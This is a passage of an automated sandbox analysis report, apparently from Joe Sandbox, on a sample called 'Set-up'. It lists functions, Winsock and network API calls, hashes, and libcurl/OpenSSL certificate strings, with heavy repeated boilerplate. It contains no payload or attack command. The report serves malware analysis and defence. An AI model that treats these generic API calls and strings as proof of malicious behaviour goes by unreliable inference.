Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: 446c28e8025ed82159f871e8a0edb6e7f07ffb9bc95eb1bbbf766ab084a87cdc
Instruction ID: ccc4bfbfb56a8836f82025cc3fdbdc0de171cfb3e960f8c004e105f4f56b9e02
Opcode Fuzzy Hash: 446c28e8025ed82159f871e8a0edb6e7f07ffb9bc95eb1bbbf766ab084a87cdc
Instruction Fuzzy Hash: 30119670808785AAEB268F18E402BE6F3F4EFD0329F108A59E9D942150F73659C5CBC2

Function 00B2A920 Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,00000000), ref: 00B2A97E

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: be227541b2f9a69cb71edfd2dc8ba95acec1260566803560e656f0b949abfddb
Instruction ID: 2dae9c663271fad4bf79df5b3241e74377092ae6414591198918d0305699b8ee
Opcode Fuzzy Hash: be227541b2f9a69cb71edfd2dc8ba95acec1260566803560e656f0b949abfddb
Instruction Fuzzy Hash: 5601A271B00710AFC7148F15EC45B56BBA5FF84B20F06825DFA982B361C331AC548BD1

Function 00B2AF30 Relevance: 1.5, APIs: 1, Instructions: 28networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00B2B280,00000000), ref: 00B2AF66

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: daed6c2d5dfccf367bd9388339f9dd7f2cc6205163817a23bdb3b2a8f8906717
Instruction ID: 6fd30f7abaa680cf310d52265906b88c965d94fb313f21b72906f9d08b5c9901
Opcode Fuzzy Hash: daed6c2d5dfccf367bd9388339f9dd7f2cc6205163817a23bdb3b2a8f8906717
Instruction Fuzzy Hash: 5CE0E5B2A052216BD5549E58F8449ABF7ADEFC8F20F054A4DF86457204C374EC5087E2

Function 00B2B020 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00B2B04C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 8dcd04b7fb75cf73e56fb162b0e4df88740368f64942e76f45f92d4fe4a37da8
Instruction ID: c92b2c5d109a64696c6e56cfa6b8aa573491ca89e083f65e6be89661a029f887
Opcode Fuzzy Hash: 8dcd04b7fb75cf73e56fb162b0e4df88740368f64942e76f45f92d4fe4a37da8
Instruction Fuzzy Hash: 35E0EC3460020197CE259A14E988E5777ABBFC0710F68CAA8E46C8A595DB3BDC46C741

Function 00AC67E0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,8004667E), ref: 00AC67FB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: bb7fe173626f72dd25d139c391a357e594df2bab381244547f2a0f453f7f01b6
Instruction ID: 6420584272aef3628172251e178e576971aced61fd28b0a2ff17eca037b12389
Opcode Fuzzy Hash: bb7fe173626f72dd25d139c391a357e594df2bab381244547f2a0f453f7f01b6
Instruction Fuzzy Hash: 7BC012F1108200EFC70C4B24D449A5E7BE9EB48365F01441CB086C2180DB759850CF16

Function 00B19270 Relevance: 1.4, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00B1A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A499
Part of subcall function 00B1A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A4FB
Part of subcall function 00B1A440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00B1AA19

Part of subcall function 00B19B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,00B192A4,?,?,?,?,?,?,?,?,00000000), ref: 00B19B6E
Part of subcall function 00B19B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,00B14860,00000000), ref: 00B19C24

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 00B193C3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: AdaptersAddressesgetenv$Openmemcpy
String ID:
API String ID: 1905038125-0
Opcode ID: f4dff10671227da368bd372dc43691be0423c3d09269e12cd4ea23eaa114841f
Instruction ID: 82b210c155eebd21f5cf369619f3b20384749389c1fa21f5e7db1897d6e91b2f
Opcode Fuzzy Hash: f4dff10671227da368bd372dc43691be0423c3d09269e12cd4ea23eaa114841f
Instruction Fuzzy Hash: F551D671904342ABE720DF25E8957AABBE4FF94354F48057CF84983651E731E8A4DB82

Function 00F42B20 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00F3EBE5,?,?,?,?,?,00F3E571), ref: 00F42B55

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6c3628d5ffeb147711d21bdcddb38810c03cc16d26124daee7e440dd0ed5c1e7
Instruction ID: 852357b6f5206ab8a682cdd4af467155cbf7ae067895e5338aac2c519c7da892
Opcode Fuzzy Hash: 6c3628d5ffeb147711d21bdcddb38810c03cc16d26124daee7e440dd0ed5c1e7
Instruction Fuzzy Hash: A9E0C9B46047448B8760FE29C8C1617FBE4FE98714B450A6CE8CA47251D770E944AB72

Function 00F43BC0 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00F3EBF0,?,?,?,?,?,00F3E571), ref: 00F43BD1

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 29527eb662f17c40dfe39d8a47a766f1a3c65cfc431bb7e473818b5bd509d72c
Instruction ID: 85637493ee1fea5c5615b2348405dd89763231d0880a337cbb18801269e7fd85
Opcode Fuzzy Hash: 29527eb662f17c40dfe39d8a47a766f1a3c65cfc431bb7e473818b5bd509d72c
Instruction Fuzzy Hash: 8BD0A7719043484FC7007E588CC150A3794BAA4314F800A5CDDC81B242D7359514E7A2

Function 00C3CBC0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C17254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00C140BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C3CBD2

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 693b693258a7765fe13f7b37b06a4ffee1b3086ec49691b56b5886970f7c0844
Instruction ID: edf532bf2cbb4eb137205148e5ecccf1c13126a845e17b58f7e72284f8ab1e8f
Opcode Fuzzy Hash: 693b693258a7765fe13f7b37b06a4ffee1b3086ec49691b56b5886970f7c0844
Instruction Fuzzy Hash: FEB092AA5140449BEA067618BCC382EB265E6A0708F948931F909D10F1D6219D15B6A2

Non-executed Functions

Function 00AD62E0 Relevance: 123.9, APIs: 9, Strings: 72, Instructions: 2363stringCOMMON

Download Yara Rule

APIs

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00AD6E74
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00AD6F8A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00AD7184
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AD7263
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00AD75B8

Part of subcall function 00C2F870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 00C2F8AE

Strings

: , xrefs: 00AD78FE
SSL: unable to obtain common name from peer certificate, xrefs: 00AD7F29
unexpected ssl peer type: %d, xrefs: 00AD7621
start date: %.*s, xrefs: 00AD707C
No error, xrefs: 00AD6E65, 00AD793C
SSL: illegal cert name field, xrefs: 00AD8078
%02x:, xrefs: 00AD6CE8
Cert, xrefs: 00AD6D7F
Signature, xrefs: 00AD6D1F
hostname, xrefs: 00AD7AE1, 00AD7B10, 00AD7B29
ipv4 address, xrefs: 00AD7AD2
SSL: could not get X509-issuer name, xrefs: 00AD72C2
Version, xrefs: 00AD654F
RSA Public Key, xrefs: 00AD6C31
Invalid OCSP response, xrefs: 00AD7D4B, 00AD80B1
OCSP response verification failed, xrefs: 00AD814C
Could not get peer certificate chain, xrefs: 00AD8122
%02x, xrefs: 00AD65C8
Subject, xrefs: 00AD648C
Proxy, xrefs: 00AD6F01
subjectAltName: host "%s" matched cert's "%s", xrefs: 00AD80EC
BIO_new return NULL, OpenSSL error %s, xrefs: 00AD6E7D, 00AD7E52
Serial Number, xrefs: 00AD65F1
ipv6 address, xrefs: 00AD7AD7
Server, xrefs: 00AD6F06, 00AD6F10
SSL: Unable to read issuer cert (%s), xrefs: 00AD7995
Issuer, xrefs: 00AD64EF
SSL: public key does not match pinned public key, xrefs: 00AD82B2
<, xrefs: 00AD7F90
subjectAltName: host "%s" matched cert's IP address!, xrefs: 00AD7607
SSL certificate status: %s (%d), xrefs: 00AD83B6
Signature Algorithm, xrefs: 00AD66A6
pub_key, xrefs: 00AD6AD6, 00AD6BC4
Invalid OCSP response status: %s (%d), xrefs: 00AD77F8
Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s, xrefs: 00AD736B
SSL: could not get peer certificate, xrefs: 00AD6FD5
SSL: Certificate issuer check failed (%s), xrefs: 00AD7867
Error getting peer certificate, xrefs: 00AD8153
[NONE], xrefs: 00AD7011
SSL certificate revocation reason: %s (%d), xrefs: 00AD83F1
common name: %s (matched), xrefs: 00AD7F17
SSL certificate verify result: %s (%ld), xrefs: 00AD7FB0
pqg, xrefs: 00AD6A29, 00AD6A7E, 00AD6B13, 00AD6B6C
SSL: Unable to open issuer cert (%s), xrefs: 00AD7232
Unable to load public key, xrefs: 00AD69DB
Remove session ID again from cache, xrefs: 00AD7DD4
SSL certificate issuer check ok (%s), xrefs: 00AD7CAF
No OCSP response received, xrefs: 00AD79D8
Could not find certificate ID in OCSP response, xrefs: 00AD840A
Start date, xrefs: 00AD6887
OpenSSL, xrefs: 00AD6DFC, 00AD78D3
SSL: no alternative certificate subject name matches target %s '%s', xrefs: 00AD7B2A
dsa, xrefs: 00AD6B71, 00AD6B90, 00AD6BAE, 00AD6BC9
SSL: certificate subject name '%s' does not match target hostname '%s', xrefs: 00AD8133
Expire date, xrefs: 00AD68EE
subjectAltName does not match %s %s, xrefs: 00AD7B11
vtls/openssl.c, xrefs: 00AD7BD2, 00AD7F54, 00AD8217, 00AD8278, 00AD8293
subject: %s, xrefs: 00AD7021
OCSP response has expired, xrefs: 00AD8414
SSL certificate verify ok., xrefs: 00AD809E
SSL certificate verify result: %s (%ld), continuing anyway., xrefs: 00AD7D38
%lx, xrefs: 00AD6524
%s certificate:, xrefs: 00AD6F11
Public Key Algorithm, xrefs: 00AD6725
%s/%s, xrefs: 00AD6E01, 00AD78D8
expire date: %.*s, xrefs: 00AD70E2
BIO_new_mem_buf NULL, OpenSSL error %s, xrefs: 00AD7954
Unknown error, xrefs: 00AD6E6A, 00AD6E72, 00AD7941, 00AD7949
issuer: %s, xrefs: 00AD71CE
/%s, xrefs: 00AD7489, 00AD7741
rsa, xrefs: 00AD6C56, 00AD6C75
Error computing OCSP ID, xrefs: 00AD806E

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$memcmpmemsetstrcpystrlen
String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
API String ID: 838718518-248801092
Opcode ID: 651b6f3e7eb4275594e45a5a14775b7a567e8cfd60b25702fbfaaf99d70fcfad
Instruction ID: b8b72d3aca48509139bc0a9589efe15ed3222e54461363581d39f80eb1392504
Opcode Fuzzy Hash: 651b6f3e7eb4275594e45a5a14775b7a567e8cfd60b25702fbfaaf99d70fcfad
Instruction Fuzzy Hash: 1103D6B59083406BE720AB10ED42B6F77A8AF95708F084829FC4E56383FB75E954D793

Function 00DEE050 Relevance: 119.3, APIs: 64, Strings: 3, Instructions: 2082COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00DEE0B3
localeconv.MSVCRT ref: 00DEE0BE
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DEE149
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DEE179
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DEE1D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DEE1FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DEE20F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DEF886

Strings

d, xrefs: 00DEEAAF
, xrefs: 00DEFED0
nil), xrefs: 00DF041D

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free$isspacelocaleconv$_errno
String ID: $d$nil)
API String ID: 577766270-394766432
